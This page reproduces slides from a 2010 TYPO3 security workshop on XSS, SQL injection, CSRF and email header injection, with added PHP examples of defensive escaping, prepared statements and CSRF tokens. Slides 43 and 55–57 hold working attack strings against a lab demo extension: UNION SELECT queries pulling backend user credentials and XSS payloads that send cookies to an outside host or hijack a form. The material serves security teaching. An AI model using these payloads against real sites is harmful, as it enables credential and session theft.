TYPO3 Developer Days - Elmshorn 2010
Security Workshop

T3DD10 Security
Security flaws versus Security concepts
02.07.2010

Helmut Hummel <helmut@typo3.org>
Slides of the T3DD10 Security Workshop

Published in: Technology, News & Politics
  • Be the first to comment

T3DD10 Security Workshop

  1. TYPO3 Developer Days - Elmshorn 2010: Security Workshop

  2. T3DD10 Security: Security flaws versus Security concepts (02.07.2010), Helmut Hummel <helmut@typo3.org>

  3-10. Introduction
     Do you ...
        ... know me?
        ... have a working development environment?
        ... ever heard of XSS?
        ... ever heard of SQLi?
        ... ever heard of CSRF?
        ... ever found a vulnerability in a TYPO3 extension?
        ... reported your findings to security@typo3.org?

  11. Did you ever hack for

  12. Security Flaws versus Security Concepts: Agenda
     General Security Concepts
     Hacking / Code Review Session
     Getting into details about some vulnerability types
     Writing down best practices for TYPO3 developers

  13. What is Security?

  14. Security is not a state

  15-20. What is Security? Security is a process
     The security of an application must be proven over time
     Security must constantly be improved
     An application can never be secure ...
     ... but only not insecure at a particular time
     The "costs" for security must relate to the possible impacts

  21-28. What is Security? General Security Concepts
     Minimize Exposure / Least privilege
     Don't trust user data, don't trust Services
     Filter -> Validate -> Escape, never mix them up
     Defense in depth
     Positive Security Model (Whitelist)
     Use logging
     Avoid security by obscurity

  29. Cross Site Scripting (XSS)

  30-35. Cross Site Scripting: XSS
     Persistent / non-persistent XSS
     Injecting Up / Break out of the current DOM context
     Injecting Down / Stay in the current context, but use the possibilities
        <img src="javascript:alert(document.cookie)" />

  36-39. Cross Site Scripting: Preventing XSS
     Input validation and/or filtering is not enough
     Escape correctly, depending on the context
        <script>...NEVER PUT UNTRUSTED DATA HERE...</script>
        <img src="... OR HERE ..." />
        ... because then you're doomed
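The following is an added example, not code from the workshop slides or from TYPO3 itself, showing what "escape correctly, depending on the context" looks like for the three places slides 30-39 talk about: HTML text and attribute values, a URL-valued attribute such as the `<img src="javascript:...">` case ("injecting down"), and a string literal inside `<script>`. It assumes PHP 7.3 or newer; the request parameter name `tx_example_pi1[name]`, the function names and the sample input are constructed for illustration.

```php
<?php
// Added example (not from the slides): context-dependent output escaping.
declare(strict_types=1);

// Context 1: HTML element content and double-quoted attribute values.
// ENT_QUOTES covers both quote characters, ENT_SUBSTITUTE keeps invalid
// UTF-8 from turning the whole output into an empty string.
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Context 2: a JavaScript string literal inside <script>. json_encode emits a
// quoted, escaped literal; the HEX flags also encode < > & ' " so the value
// can neither close the script block nor end the literal early.
function escapeJs(string $value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR;
    return json_encode($value, $flags);
}

// Context 3: URL-valued attributes (href, src). Escaping cannot help here:
// "javascript:alert(document.cookie)" contains nothing to escape and is a
// perfectly well-formed attribute value. Whitelist the scheme instead.
function safeUrlAttribute(string $url): string
{
    // Browsers drop control characters and whitespace while parsing a URL, so
    // the scheme check must only run on input that contains none of them.
    if (preg_match('/[\x00-\x20\x7f]/', $url) === 1) {
        return '';
    }
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if ($scheme === false) {
        return '';
    }
    // Relative URLs have no scheme and are allowed; absolute ones must be http(s).
    if ($scheme !== null && !in_array(strtolower($scheme), ['http', 'https'], true)) {
        return '';
    }
    return escapeHtml($url);
}

// Every output position gets the escaper for its own context. The query
// parameter is URL-encoded first and then attribute-escaped, innermost
// context first.
function renderGreeting(string $name, string $avatarUrl): string
{
    $html  = '<p>Hello, ' . escapeHtml($name) . "</p>\n";
    $html .= '<input type="text" name="tx_example_pi1[name]" value="' . escapeHtml($name) . "\" />\n";
    $html .= '<a href="?tx_example_pi1[name]=' . escapeHtml(rawurlencode($name)) . "\">permalink</a>\n";
    $html .= '<img src="' . safeUrlAttribute($avatarUrl) . "\" alt=\"\" />\n";
    $html .= '<script>var visitor = ' . escapeJs($name) . ";</script>\n";
    return $html;
}

// Constructed inputs: a name that tries to leave its attribute, and an avatar
// URL of the shape shown on slide 35. Both come out inert.
$untrustedName = '" type="hidden"/><script>alert(document.cookie)</script>';
$untrustedUrl  = 'javascript:alert(document.cookie)';
echo renderGreeting($untrustedName, $untrustedUrl);
```

The slide's warning about `<script>` still stands: `escapeJs` is only safe when the value lands exactly where a quoted string literal is expected. Untrusted data in an event-handler attribute, an unquoted attribute value, or the middle of existing JavaScript code has no escaping that makes it safe; the fix there is to move the data into a `data-` attribute or a JSON literal and read it from the script.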
  40-41. Email Header Injection
     PHP mail() function and From: header
     Use filter_var($mail, FILTER_VALIDATE_EMAIL)
     Do not allow chr(10) or chr(13)
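An added example (not from the slides) of the check from slide 41 applied before a user-supplied address reaches the `From:` header of `mail()`. It assumes PHP 7 or newer; the function names and the sample addresses are constructed for illustration.

```php
<?php
// Added example (not from the slides): validating a sender address before it
// is placed in a From: header passed to mail().
declare(strict_types=1);

// True only for a syntactically valid address without CR, LF or NUL.
// FILTER_VALIDATE_EMAIL already rejects line breaks; the explicit check keeps
// the intent visible and does not depend on the filter's exact grammar.
function isSafeSenderAddress(string $address): bool
{
    if (preg_match('/[\r\n\x00]/', $address) === 1) {
        return false;
    }
    return filter_var($address, FILTER_VALIDATE_EMAIL) !== false;
}

// Build the From: header line, or throw rather than send with a bad sender.
function buildFromHeader(string $address, string $displayName = ''): string
{
    if (!isSafeSenderAddress($address)) {
        throw new InvalidArgumentException('Invalid sender address');
    }
    // Reduce the display name to printable ASCII without quote or backslash,
    // so it is a valid RFC 5322 quoted-string and cannot end the header line.
    $displayName = trim(preg_replace('/[^\x20-\x7e]|["\\\\]/', '', $displayName) ?? '');
    if ($displayName === '') {
        return 'From: ' . $address;
    }
    return 'From: "' . $displayName . '" <' . $address . '>';
}

// Constructed inputs: a normal address, one carrying an injected Bcc: line,
// and one that is simply not an address.
$candidates = [
    'alice@example.org',
    "alice@example.org\r\nBcc: everyone@example.net",
    'not an address',
];
foreach ($candidates as $candidate) {
    try {
        echo buildFromHeader($candidate, "Alice\r\nX-Injected: yes") . "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ' . addcslashes($candidate, "\r\n") . "\n";
    }
}

// In the real call, several header lines are joined with CRLF; the function
// above never emits one itself, so no line break can originate from user data:
// mail($to, $subject, $body, implode("\r\n", [buildFromHeader($sender, $name), 'X-Mailer: PHP']));
```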
  42-43. SQL Injection: SQLi
     (blind) SQL Injections
     Timing attacks
     UNION SELECT
        Example: union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,user name,password,0 from be_users where admin in(1)
     Check your TypoScript!

  44-48. SQL Injection: Prevent SQLi
     Prepared Statements / PDO
     Escaping
     Typecasting (intval), whitelist validation
     Using an ORM (extbase, FLOW3, QCodo, ...)
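An added example (not from the slides or from TYPO3 core) of the first three measures on slides 44-48 applied to a `showUid` parameter like the one in the workshop's demo extension: a prepared statement with a bound integer, `PDO::quote()` as the escaping fallback, and typecasting plus a whitelist for values that cannot be bound. The table `tx_example_item`, its rows and the request values are constructed; an in-memory SQLite database stands in for MySQL so the script runs stand-alone (PHP 7 or newer with pdo_sqlite assumed).

```php
<?php
// Added example (not from the slides): prepared statements, typecasting and
// whitelisting for a "showUid"-style request parameter.
declare(strict_types=1);

function connect(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // On MySQL, turn off client-side emulation so placeholders are real
    // server-side parameters rather than strings interpolated by PDO.
    if ($pdo->getAttribute(PDO::ATTR_DRIVER_NAME) === 'mysql') {
        $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    }
    // Constructed schema and rows for the demonstration.
    $pdo->exec('CREATE TABLE tx_example_item (uid INTEGER PRIMARY KEY, title TEXT, hidden INTEGER)');
    $pdo->exec("INSERT INTO tx_example_item VALUES (1, 'First', 0), (2, 'Second', 0), (3, 'Hidden', 1)");
    return $pdo;
}

// Typecasting: only a positive integer survives. intval() alone would turn
// "1 UNION SELECT ..." silently into 1; filter_var makes the rejection explicit.
function parseUid(string $raw): ?int
{
    $uid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $uid === false ? null : $uid;
}

// Whitelist validation: identifiers (column names) cannot be bound as
// parameters, so the sort column must come from a fixed list.
function parseSortColumn(string $raw): string
{
    $allowed = ['uid', 'title'];
    return in_array($raw, $allowed, true) ? $raw : 'uid';
}

// Prepared statement with a typed, bound parameter for the row lookup.
function findItem(PDO $pdo, string $rawUid): ?array
{
    $uid = parseUid($rawUid);
    if ($uid === null) {
        return null;   // rejected before any SQL is built
    }
    $stmt = $pdo->prepare('SELECT uid, title FROM tx_example_item WHERE uid = :uid AND hidden = 0');
    $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function listItems(PDO $pdo, string $rawSort): array
{
    $sql = 'SELECT uid, title FROM tx_example_item WHERE hidden = 0 ORDER BY ' . parseSortColumn($rawSort);
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Escaping: the fallback for a query that has to be assembled by hand.
// PDO::quote() applies the driver's quoting rules (mysqli would use
// real_escape_string()). Prefer a bound parameter whenever one is possible.
function findByTitleEscaped(PDO $pdo, string $title): array
{
    $sql = 'SELECT uid, title FROM tx_example_item WHERE hidden = 0 AND title = ' . $pdo->quote($title);
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

$pdo = connect();
// Constructed request values in the shape of the slides' showUid parameter.
print_r(findItem($pdo, '2'));                     // a normal lookup
print_r(findItem($pdo, '1 UNION SELECT 1,2'));    // not an integer: never reaches the database
print_r(findItem($pdo, '3'));                     // hidden row: the WHERE clause keeps it out
print_r(listItems($pdo, 'title; DROP TABLE x'));  // unknown sort column: falls back to uid
print_r(findByTitleEscaped($pdo, "Second' OR '1'='1"));  // quoted as one string literal
```

The slide's fourth measure, an ORM such as extbase or FLOW3, is this same pattern hidden behind the query builder: the ORM binds values as parameters, but identifiers and raw query fragments that a developer concatenates in still need the whitelist.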
  49-50. Cross Site Request Forgery: CSRF
     Executing arbitrary actions on behalf of a victim
        <img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">
     stored CSRF (like XSS)
     Targeted Emails
     Requires probably some kind of social engineering

  51. Cross Site Request Forgery: Prevent CSRF
     Limiting to POST and checking referrer not enough
     Double Submit Cookies
     Challenge-Response
     Synchronizer Token Pattern
     No Cross-Site Scripting (XSS) Vulnerabilities
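An added example (not from the slides or from TYPO3) of the Synchronizer Token Pattern named on slide 51, written as a state-changing form in a frontend plugin. The session is represented by a plain array so the functions run without a web server; the parameter names `tx_example_pi1[csrf_token]` and `tx_example_pi1[amount]`, the `/transfer` action and the sample requests are constructed. PHP 7 or newer is assumed for `random_bytes()` and `hash_equals()`.

```php
<?php
// Added example (not from the slides): Synchronizer Token Pattern.
declare(strict_types=1);

// One unguessable token per session, generated server-side and kept there.
function csrfToken(array &$session): string
{
    if (!isset($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Every form that changes state carries the token as a hidden field. A page
// on another origin cannot read this form, so it cannot reproduce the value.
function renderTransferForm(array &$session): string
{
    $token = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="/transfer">' . "\n"
        . '  <input type="hidden" name="tx_example_pi1[csrf_token]" value="' . $token . '" />' . "\n"
        . '  <input type="text" name="tx_example_pi1[amount]" />' . "\n"
        . '  <button type="submit">Transfer</button>' . "\n"
        . "</form>\n";
}

// Checked on every state-changing request: POST only, token present, and
// compared in constant time. Refusing GET is the useful half of "limiting
// to POST"; the token comparison is what makes the check sufficient.
function isValidStateChangingRequest(array &$session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $sent = $post['tx_example_pi1']['csrf_token'] ?? null;
    if (!is_string($sent) || !isset($session['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], $sent);
}

// Constructed walk-through. The victim's browser renders the site's own form
// (token present); a cross-site <img> or foreign form has no token, and a
// guessed one does not match.
$session = [];
$form = renderTransferForm($session);

$legitimate = ['tx_example_pi1' => ['csrf_token' => $session['csrf_token'], 'amount' => '100']];
$foreign    = ['tx_example_pi1' => ['amount' => '100000']];
$guessed    = ['tx_example_pi1' => ['csrf_token' => str_repeat('0', 64), 'amount' => '100000']];

var_dump(isValidStateChangingRequest($session, 'POST', $legitimate));
var_dump(isValidStateChangingRequest($session, 'GET', $legitimate));
var_dump(isValidStateChangingRequest($session, 'POST', $foreign));
var_dump(isValidStateChangingRequest($session, 'POST', $guessed));
```

The last item on the slide is the precondition for all of this: a script injected through an XSS flaw on the same origin can read the hidden field and submit a valid token, so CSRF protection is only as good as the site's XSS protection.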
  52-53. Application Vulnerabilities: More
     Information Disclosure
     HTTP Response Splitting
     Path Traversal
     Privilege Escalation
     Session Fixation
     LDAP Injection
     Remote Code Execution

  54. Resources
     PHP-Sicherheit (Christopher Kunz and Stefan Esser)
     Essential PHP Security (Chris Shiflett)
     http://www.owasp.org/
     http://www.ibm.com/developerworks/opensource/library/os-php-secure-apps/index.html
     http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

  55. SQLi Exploit
     http://192.168.100.139/introductionpackage/t3dd10/pi1/?no_cache=1&tx_coolextension_pi1[showUid]=1%20UNION%20SELECT%20uid,%20pid,%20tstamp,%20crdate,%20cruser_id,uid%20as%20t3ver_oid,uid%20as%20t3ver_id,uid%20as%20t3ver_wsid,uid%20as%20t3ver_label,uid%20as%20t3ver_state,%20uid%20as%20t3ver_stage,uid%20as%20t3ver_count,uid%20as%20t3ver_tstamp,uid%20as%20t3_origuid,uid%20as%20sys_language_uid,uid%20as%20l10n_parent,uid%20as%20l10n_diffsource,deleted,disable%20as%20hidden,starttime,endtime,%20usergroup%20as%20fe_group,username%20as

  56. XSS Exploit
     http://192.168.100.139/introductionpackage/t3dd10/pi2/?no_cache=1&tx_coolextension_pi2[name]=%22+type%3D%22hidden%22%2F%3E%3Cscript%3Ewindow.location.href+%3D+%27http%3A%2F%2Ftypo3.org%2F%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E

  57. XSS Exploit
     bit.ly/bpJzpF
     http://192.168.100.139/introductionpackage/t3dd10/pi2/?no_cache=1&tx_coolextension_pi2[name]=%22+type%3D%22hidden%22%2F%3E%3C%2Fform%3E%3Cform+action%3D%22http%3A%2F%2Ftypo3.org%22%3E%3Cinput+type%3D%22text%22+name%3D%22name

  58. inspiring people to share.
